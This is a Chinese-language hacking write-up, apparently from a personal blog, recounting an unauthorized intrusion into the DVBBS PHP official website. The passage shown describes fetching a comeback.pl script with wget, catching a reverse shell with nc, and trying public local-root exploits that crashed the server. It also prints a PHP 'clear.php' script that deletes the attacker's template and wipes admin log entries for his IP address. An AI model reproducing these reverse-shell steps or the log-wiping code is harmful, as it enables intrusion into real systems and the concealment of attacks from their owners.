|
[图文]拿下DVBBS php官网
四、 失败的提权:
由于提权失败了,所以这部分我也简单略过,虽然这花费了我一半的时间,可是水平不济啊。管理员权限给的太变态了,除了uploadfile,其他所有目录都不可写…不管了,有可写的地方就可以了,先查下服务器版本,输入uname -a;id,返回:
Linux p.dvbbs.net 2.6.9-5.ELsmp #1 SMP Wed Jan 5 19:30:39 EST 2005 i686 i686 i386 GNU/Linux
uid=2(daemon) gid=2(daemon) groups=1(bin),2(daemon),4(adm),7(lp)
检 查了下perl 、wget,都安装上了,于是wget一个comeback.pl,接着用NC反弹下,也成功反弹回来本地shell,心想这么顺利啊,接下来就是提权 了,可是翻遍了milw0rm.com,找了各种提权的利用程序,就是没有一个能成功的,我百度谷歌了N久,网上有关linux下提权的文章非常少,有的 基本都是一个样,反弹一下然后提权,可是大家能轻松提权的prtcl.c在这里对它无可奈何…
到了下午实在太困了睡了一会儿,醒来后继续搞,但最后还是以失败告终,并且把它服务器溢出挂了,我赶紧收手,哎,我太菜了,就不做坏事了,留个页面纪念下:
五、 清理残留:
Linux下的残留我就没办法了,没提权成功,权限太小;但网站留下来的东西必须清理掉。于是写个clear.php:
| 以下是引用片段: define(’ISDVBBS’, TRUE); require ’../inc/config.php’; require ’../inc/dv_clssql.php’; $db= new sqldb(); defined(’DV_MUF_DB_HOST’) AND ($dbhost = DV_MUF_DB_HOST); $db->connect($dbhost, $dbuser, $dbpw, $dbname , $charset,$pconnect); //清除我新建的模板 $db->query("DELETE FROM dv_styles WHERE name=’啊啊啊’"); //清除我所在的IP后台操作日志 $db->query("DELETE FROM dv_log WHERE l_ip=’58.213.51.65’"); echo "ok!"; ?> |
总 结:到此为止,入侵告一段落,由于水平有限,所以耗时比较多,整整三天睡了十个多小时(绝大多数时间耗在失败的提权里),这里我只想说,没有绝对安全的程 序,也没有绝对安全的网站,技术固然重要,思路也必不可少。最后感谢flyh4t给予的大力支持,感谢老婆rolin的鼓励与端茶送水:),欢迎大家访问 我的网站:http://www.oldjun.com
| 实例讲解跨站入侵攻防战之攻击篇 | 05-08 |
| 对偶偶娱乐分站服务器的安全检测 | 04-23 |
| 入侵88red系统的详细过程 | 04-07 |
| 对趋势科技等数万网站被攻击的分 | 03-21 |
| 凡人网络购物系统 V8.0 简体中文 | 03-18 |
| linux平台下渗透日本著名XXXXXX. | 03-18 |
| 搜索框所引起的XSS漏洞 | 03-05 |
| 跳转漏洞的利用 | 03-05 |
| 对复旦大学的一次漫长渗透 | 03-03 |
| .net一句话马以及dx论坛拿shell | 03-01 |
| php渗透入侵过程图文详解 | 03-01 |
| DJ网站的入侵详细过程 | 02-26 |
您现在的位置: